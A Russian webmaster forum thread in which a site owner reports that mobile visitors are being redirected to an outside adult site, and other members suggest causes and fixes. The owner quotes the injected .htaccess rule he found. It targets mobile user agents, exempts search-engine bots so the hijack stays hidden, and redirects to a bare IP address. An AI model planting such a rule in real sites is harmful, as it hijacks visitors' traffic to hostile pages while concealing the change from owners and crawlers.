X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Проблема с VDS
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:01; Ответить: prohorov
Сообщение #1


Участник
***

Группа: User
Сообщений: 135
Регистрация: 8.6.2010
Из: Москва
Поблагодарили: 9 раз
Репутация:   5  


Собственно сабж.

Сегодня решил почитать сайт через мобильный телефон и было большим удивлением то, что на свой сайт зайти я не могу, так как шла переадресация на сторонний ресурс. А именно ero888/com/s/5533

Покопавшись на VDSe нашел в .htaccess некий код который вел на выше указанный сайт.

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_vali
dator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yande
xaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yande
x
imageresizer) [NC]
RewriteRule (.*) http://91.121.64.83/?3 [L,R=302]


На это, хостер, мне ответил довольно стандартной фразой.

Тут не чего пояснять, взломали вам сайт или увели пароль от фтп

такое случается каждый день с десятками людей, у кого пароль увели а у кого движок старый и дырявый.

1. измените все пароли
2. проверте свой комп на вирусы.
3. обновите движки и плагины ВСЕХ сайтов до последних версий
4. Проведите аудит файлов сайтов на предмет залитого шела.

Если последние два пункта вызывают затруднения наймите опытного вэбмастера для проведения работ.


Ранее я сталкивался с темой о том, что хостеры самостоятельно добавляют подобные строчки дабы сливать мобильный трафик с сайта без ведома сайтовода. Хочу поинтересоваться у ребят со стажем. Был ли подобный опыт и на сколько правдивы слова хостера относительно этого вопроса? В принципе сайт взломать достаточно не просто, так как там стоят 20 - 30 значные (цифровые, буквенные) пароли на фтп и на базу, про остальное не говорю.

UPD: Движок DLE 9.2

Сообщение отредактировал prohorov - 5.7.2012, 21:04


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:03; Ответить: Lordie
Сообщение #2


Топовый постер
*******


Группа: Active User
Сообщений: 4737
Регистрация: 11.5.2008
Поблагодарили: 966 раз
Репутация:   153  


prohorov, хостер прав. Нет, в работу VDS, обычно, никто и нигде не вмешивается.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 5.7.2012, 21:04; Ответить: AleZ
Сообщение #3


Частый гость
**

Группа: User
Сообщений: 70
Регистрация: 7.6.2012
Из: Москва
Поблагодарили: 28 раз
Репутация:   6  


На одном из ресурсов известных, которые распространяли Dle взломанные и как-бы чистые, как раз в мобильной версии была переадресация и тоже через htaccess. Так что тут мало данных. Возможно, был залит такой движок изначально.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:05; Ответить: prohorov
Сообщение #4


Участник
***

Группа: User
Сообщений: 135
Регистрация: 8.6.2010
Из: Москва
Поблагодарили: 9 раз
Репутация:   5  


AleZ, сайту полтора года, вряд ли первоначально такое было залито. плюс ко всему такого ранее не бывало. эта проблема, кстати, возникла с вашим хостером в подписи.
Lordie, не раз сталкивался с такой темой даже тут, на мауле. то что хостер сливает моб. трафик.

Сообщение отредактировал prohorov - 5.7.2012, 21:07


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:07; Ответить: Lordie
Сообщение #5


Топовый постер
*******


Группа: Active User
Сообщений: 4737
Регистрация: 11.5.2008
Поблагодарили: 966 раз
Репутация:   153  


prohorov, хостинг и VDS - это все же разные вещи. И пенять на хостера не стоит, пока остальные варианты не исключены. В конце концов, если вы столь предрасположены против хостера - зачем брали у такого, какому доверия нету?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:09; Ответить: prohorov
Сообщение #6


Участник
***

Группа: User
Сообщений: 135
Регистрация: 8.6.2010
Из: Москва
Поблагодарили: 9 раз
Репутация:   5  


Lordie, За полтора года не было нареканий на camel. Проблема возникла буквально за 1 - 2 недели, так как ранее я заходил с мобильника/планшетника без особых проблем. Я не обвиняю именно хостера в этой проблеме, просто вся суть в том, что сайт, в плане паролей, закрыт довольно сильно.


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 5.7.2012, 21:10; Ответить: AleZ
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 70
Регистрация: 7.6.2012
Из: Москва
Поблагодарили: 28 раз
Репутация:   6  


huh.gif У меня нет хостера в подписи и подписи как таковой. Что же касается VDS, то тут многое зависит от его настройки. Это вам не шаред, где все зависит от хостера и то, даже там рекомендовано на файлы вида htaccess ставить 444
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:12; Ответить: Lordie
Сообщение #8


Топовый постер
*******


Группа: Active User
Сообщений: 4737
Регистрация: 11.5.2008
Поблагодарили: 966 раз
Репутация:   153  


prohorov, сайт, возможно, и закрыт сильно, а вот ваш ПК (или какой-либо иной, с которого вы подключались) - мог вполне быть и заражен. Если хостеру доверяете - тем более, следуйте и так предоставленной вам весьма четкой инструкции, обсуждать особо нечего.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Тирасполь
Тирасполь
сообщение 5.7.2012, 21:16; Ответить: Тирасполь
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 1.5.2011
Из: Тирасполь
Поблагодарили: 236 раз
Репутация:   60  


prohorov, задача дырку залатать или виноватого найти?
Предположим, Вам сейчас скажут, что хостер мог залить. И что? Поменяете хостера, опять зальют. Кого винить будете? Вы движетесь не в ту сторону. Устраняйте проблему, усиливайте безопасность - это единственное, что может дать положительный результат в таком случае.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:17; Ответить: prohorov
Сообщение #10


Участник
***

Группа: User
Сообщений: 135
Регистрация: 8.6.2010
Из: Москва
Поблагодарили: 9 раз
Репутация:   5  


AleZ, прошу прощения, промахнулсяwink.gif
Lordie, хотелось бы понять, чем и кемwink.gif
Тирасполь, Да это все понятно что не стоит искать виновного, вопрос в другом, каким образом усиливать защиту от подобного.

Сообщение отредактировал prohorov - 5.7.2012, 21:18


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Well-Web - хостинг от 79 р., VDS от 392 р. SSD диски! Бесплатные SSL от Lets Encrypt!
Всем посетителям форума скидка на первый платеж в 25% по промо: MAUTL
82 WellWeb 18338 27.11.2017, 9:46
автор: WellWeb
Горячая тема (нет новых ответов) Friendhosting.net: SSD VDS от 4.99$, Dedicated и регистрация доменов
Дружелюбный хостинг
55 pavellift 11592 27.11.2017, 1:37
автор: pavellift
Горячая тема (нет новых ответов) WebHOST1 − недорогой и качественный VDS и SSD хостинг
48 WebHost1 15814 23.11.2017, 14:25
автор: WebHost1
Открытая тема (нет новых ответов) Проблема индексации в Google
12 Saitcena 2949 22.11.2017, 17:34
автор: metvekot
Открытая тема (нет новых ответов) Проблема с 301 редиректом в htaccess
не срабатывает с (без www) на www
14 danc1r0k 1986 2.11.2017, 14:44
автор: vadosseo


 



RSS Текстовая версия Сейчас: 15.12.2017, 2:47
Дизайн